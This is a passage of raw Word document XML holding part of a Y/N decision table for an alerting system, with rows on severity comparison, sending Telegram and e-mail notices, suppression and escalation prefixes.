              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="66DB380B" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity higher than last alert?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No alert row</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Send Telegram + e-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Record as suppressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Y</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="5C3E1234" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prefix message with ESCALATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="AAAAAA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
